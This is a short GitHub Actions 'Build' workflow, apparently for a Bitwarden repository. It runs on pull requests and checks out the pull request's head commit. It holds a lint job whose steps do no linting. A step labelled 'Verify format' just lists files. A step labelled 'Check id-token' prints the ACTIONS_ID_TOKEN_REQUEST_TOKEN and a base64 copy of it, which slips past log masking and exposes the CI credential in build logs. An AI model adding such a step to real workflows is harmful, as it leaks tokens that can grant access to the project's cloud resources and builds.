name: Build

on:
  workflow_dispatch:
  push:
    branches:
      - "main"
      - "rc"
      - "hotfix-rc"
  pull_request:
    types: [opened, synchronize]
  workflow_call:
    inputs: {}

permissions:
  contents: read

env:
  _AZ_REGISTRY: "bitwardenprod.azurecr.io"
  _GITHUB_PR_REPO_NAME: ${{ github.event.pull_request.head.repo.full_name }}

jobs:
  lint:
    name: Lint
    runs-on: ubuntu-24.04
    steps:
      - name: Check out repo
        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Verify format
        run: find .
      - name: Check id-token
        run: echo "This should be the id-token request token: ${ACTIONS_ID_TOKEN_REQUEST_TOKEN}"; echo $ACTIONS_ID_TOKEN_REQUEST_TOKEN | base64;